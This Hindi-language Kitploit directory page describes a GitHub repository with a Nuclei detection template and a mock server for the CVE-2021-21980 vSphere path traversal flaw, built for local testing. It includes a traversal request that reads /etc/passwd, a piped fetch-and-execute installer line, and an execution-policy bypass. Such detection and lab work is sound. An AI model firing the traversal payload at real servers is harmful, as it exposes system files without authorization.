Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2021-21980-mock-server — CVE-2021-21980 | Kitploit
उपकरण/GitHubGitHub/gui2000guix-ui/cve-2021-21980-mock-server
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubgui2000guix-ui/cve-2021-21980-mock-server

cve-2021-21980-mock-server

CVE-2021-21980

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

Clippy of the Dead - CVE-2021-21980 परीक्षण वातावरण और Nuclei टेम्पलेट

इस रिपॉज़िटरी में CVE-2021-21980 (vSphere Web Client path traversal) का पता लगाने के लिए एक उच्च-विश्वसनीयता वाला Nuclei टेम्पलेट और एक छोटा मॉक वातावरण है जो सुरक्षित स्थानीय परीक्षण के लिए कमज़ोर व्यवहार की प्रतिकृति बनाता है।

फ़ाइलें:

  • cve-2021-21980.yaml: एकाधिक एन्कोडिंग वेरिएंट और मैचर्स वाला Nuclei टेम्पलेट
  • app.py: /eam/vib path traversal भेद्यता का अनुकरण करने वाला एक छोटा Flask ऐप
  • Dockerfile: स्व-हस्ताक्षरित TLS प्रमाणपत्र के साथ मॉक सर्वर के लिए कंटेनर इमेज
  • docker-compose.yml: होस्ट 8443 पर सुनने वाले मॉक सर्वर को चलाता है
  • requirements.txt: Python निर्भरताएँ

अस्वीकरण

  • यह रिपॉज़िटरी केवल शोध, परीक्षण और सुरक्षात्मक उद्देश्यों के लिए है। इसे किसी ऐसी प्रणाली के विरुद्ध उपयोग न करें जिसे स्कैन करने के लिए आप अधिकृत नहीं हैं।
  • यह मॉक सर्वर VMware vCenter नहीं है; यह केवल सुरक्षित PoC/परीक्षण के लिए कमज़ोर व्यवहार का अनुकरण करता है।

स्थानीय रूप से कैसे चलाएँ (Windows PowerShell उदाहरण)

  1. मॉक कंटेनर बनाएँ और चलाएँ:
root@kitploit:~
cd C:\Users\gui\Documents\hi
docker-compose up --build -d

मॉक सर्वर https://localhost:8443 पर सुनेगा (स्व-हस्ताक्षरित TLS प्रमाणपत्र)।

  1. त्वरित curl जाँच (स्व-हस्ताक्षरित प्रमाणपत्र के कारण insecure फ़्लैग):
root@kitploit:~
curl -k "https://localhost:8443/"  # should return VMware vSphere Web Client (mock)
curl -k "https://localhost:8443/eam/vib?id=../../../../../../../../../../etc/passwd"

आपको मॉक /app/sensitive/passwd-mock फ़ाइल की सामग्री प्राप्त होनी चाहिए।

  1. मॉक सर्वर के विरुद्ध टेम्पलेट को मान्य करने के लिए Nuclei चलाएँ (पहले Nuclei इंस्टॉल करें):
root@kitploit:~
nuclei -t cve-2021-21980.yaml -u https://localhost:8443 -insecure
  1. सफल होने पर आउटपुट PoC के लिए एक मैच दिखाना चाहिए।

परीक्षण नोट्स

  • यदि आप कई एन्कोडिंग वेरिएंट का परीक्षण करना चाहते हैं, तो Nuclei टेम्पलेट को उच्च verbosity के साथ चलाने के लिए सेट करें।

  • यह मॉक सर्वर मॉक फ़ाइल लौटाता है जो /etc/passwd की प्रतिकृति बनाती है; वास्तविक वातावरण में स्वचालित परीक्षण स्क्रिप्ट

    run_local_test.ps1 चलाएँ जो बिल्ड करता है, तैयारी की प्रतीक्षा करता है और curl जाँचें निष्पादित करता है, साथ ही उपलब्ध होने पर Nuclei भी।

    root@kitploit:~
    powershell -ExecutionPolicy Bypass -File .\run_local_test.ps1
    

    Windows पर Nuclei इंस्टॉल करें (त्वरित):

    1. Scoop का उपयोग करके (अनुशंसित):
    root@kitploit:~
    iwr -useb get.scoop.sh | iex
    scoop install coreutils
    scoop install nuclei
    
    1. या रिलीज़ से डाउनलोड करके PATH में जोड़ें:
    root@kitploit:~
    Invoke-WebRequest -Uri https://github.com/projectdiscovery/nuclei/releases/latest/download/nuclei_windows_amd64.zip -OutFile nuclei.zip
    Expand-Archive -Path nuclei.zip -DestinationPath .\nuclei
    Add-Content -Path $PROFILE -Value 'set PATH=$Env:PATH;$(Resolve-Path .\nuclei)'
    

    नोट्स

    यदि PATH में नहीं है तो केवल curl परीक्षणों तक ही निष्पादित होगा। यदि आपको docker इमेज बनाने में समस्या आती है, तो सुनिश्चित करें कि Docker Desktop इंस्टॉल है और 'Use the WSL 2 based engine' सक्षम है। यदि सर्वर कमज़ोर है तो /etc/passwd या समान फ़ाइल लौटाई जाएगी।

सुरक्षा: सिस्टम को स्कैन करने या उनका शोषण करने से पहले हमेशा स्पष्ट प्राधिकरण लें।

टूल डाउनलोड करें
nuclei
run_local_test.ps1